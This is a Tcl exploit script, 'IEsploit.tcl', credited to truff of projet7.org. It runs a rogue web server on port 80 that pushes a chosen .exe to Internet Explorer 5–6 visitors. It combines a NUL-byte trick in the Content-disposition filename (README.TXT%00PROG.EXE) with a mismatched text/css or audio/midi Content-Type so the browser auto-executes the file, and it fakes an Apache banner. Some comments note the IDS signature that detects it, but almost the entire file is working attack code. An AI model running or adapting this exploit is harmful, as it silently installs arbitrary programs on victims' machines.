#!/usr/local/bin/tclsh

###################################################
# IEsploit.tcl  by truff (truff@projet7.org)      #
#                                                 #
# Uploads and runs a .exe on a WindoZe b0x        #
# Exploits 2 holes in IE, a %00 in the file name  #
# and the auto execution of certain mime types    # 
#                                                 #
# Usage: ./IEsploit.tcl code.exe                  #
# and on a Windoze b0x                            #
# http://ip_of_the_b0x_where_the_exploit_runs     #
#                                                 #
# Tested on : Xp  running MSIE 6.0                #
#             w2k running MSIE 5.5                #
#             w98 running MSIE 5.0                #
#                                                 #
#   www.projet7.org       -Security Research-     #
###################################################


proc Connection {s a p} {
    # Accept callback registered by the socket -server call at the bottom of
    # the script: s is the client channel, a and p the peer address and port.
    puts "Connection acceptée $a $p"
    
    # Leave the client channel blocking and route every readable event to
    # Message, which parses the request one line per event.
    fconfigure $s -blocking 1
    fileevent $s readable "Message $s"
}

proc Message {s} {
    # Readable-event handler: reads one request line per call and echoes it.
    global version

    gets $s line
    puts $line

    # Scrape the three characters following "MSIE " in the request line
    # (the User-Agent version, e.g. "6.0") into the global that Reply uses to
    # pick its response headers. Lines without "MSIE" leave version untouched.
    set index [string first "MSIE" $line]
    if {$index != -1} {
	set version [string range $line [expr $index + 5] [expr $index + 7]]
    }
    
    # An empty line marks the end of the request header block; only then is
    # the response written.
    set test [string equal $line ""]
    if {$test} {
	puts "Replys n0w !!"
	Reply $s
    }
}

proc Reply {s} {
    # Writes a hand-built HTTP/1.1 response whose body is the raw bytes of
    # $file (the path given on the command line) and then closes the socket.
    # The header pair sent below is the observable signature of this
    # technique: a Content-disposition filename containing an encoded NUL
    # (%00) combined with a benign Content-Type that does not match the
    # executable actually delivered. Proxy or IDS rules that reject %00
    # inside Content-disposition filenames, or that compare the declared
    # Content-Type against the body, catch this response.
    global file
    global version

    puts $s "HTTP/1.1 200 OK\r"
    
    # Date header is whatever the system date command prints, not an
    # RFC 1123 timestamp.
    set date [exec date]
    puts $s "Date: $date\r"
    
    # Forged server banner.
    puts $s "Server: Apache\r"

    # The version scraped by Message selects the disposition filename:
    # "6.0" gets the .TXT variant, anything else (including an empty version
    # when no MSIE token was seen) gets the .MID variant.
    if {[string equal $version "6.0"]} {
	puts "txt"
	puts $s "Content-disposition: inline; filename=\"README.TXT%00PROG.EXE\"\r"
    } else {
	puts "mid"
	puts $s "Content-disposition: inline; filename=\"README.MID%00PROG.EXE\"\r"
    }

    puts $s "Connection: close\r"

    # Content-Type is chosen to agree with the disposition extension above,
    # not with the body that follows.
    if {[string equal $version "6.0"]} {
	puts $s "Content-Type: text/css\r"
    } else {
	puts $s "Content-Type: audio/midi\r"
    }
    # Blank line terminates the response headers.
    puts $s "\r"

    # Switch the socket to binary so the file is copied byte-for-byte.
    fconfigure $s -translation binary

    # Read the whole file into memory; the $exe channel is never closed.
    set exe [open $file r]
    fconfigure $exe -translation binary
    set contents [read $exe]

    # Send the body, detach the readable handler and drop the connection.
    puts $s $contents
    flush $s
    fileevent $s readable ""
    close $s
}
    

# Script entry point. version is filled in later by Message; file is the
# path of the executable passed as the first command-line argument.
set version ""
set file [lindex $argv 0]

# Listen on TCP port 80 (no -myaddr, so on every interface; binding a
# privileged port normally needs root) and hand accepted connections to
# Connection.
socket -server Connection 80 

# Enter the Tcl event loop. fin is never set anywhere, so the server runs
# until the process is interrupted.
set fin 0
vwait fin

